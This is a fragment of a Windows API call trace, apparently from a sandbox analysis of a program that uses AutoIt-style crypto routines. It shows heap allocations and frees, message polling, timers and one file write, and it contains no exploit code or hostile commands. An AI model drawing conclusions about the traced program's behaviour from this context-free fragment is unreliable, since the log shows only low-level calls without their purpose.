RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0230.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0230.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0230.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0230.511] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.511] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.552] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0230.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0230.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e80330 [0230.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e9afd0 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e80330 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9afd0 | out: hHeap=0x970000) returned 1 [0230.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e9afd0 [0230.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3caf0 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0230.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0230.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2f4a8 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0230.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d980 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21e60 | out: hHeap=0x970000) returned 1 [0230.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0230.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0230.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e80330 [0230.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9afd0 | out: hHeap=0x970000) returned 1 [0230.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0230.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0230.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0230.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2f14818 [0230.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.569] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xd648, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xd648, lpOverlapped=0x0) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0230.571] TranslateMessage (lpMsg=0x8cf708) returned 0 [0230.571] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0230.571] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0230.571] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0230.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0230.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.572] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fe8 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0230.573] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 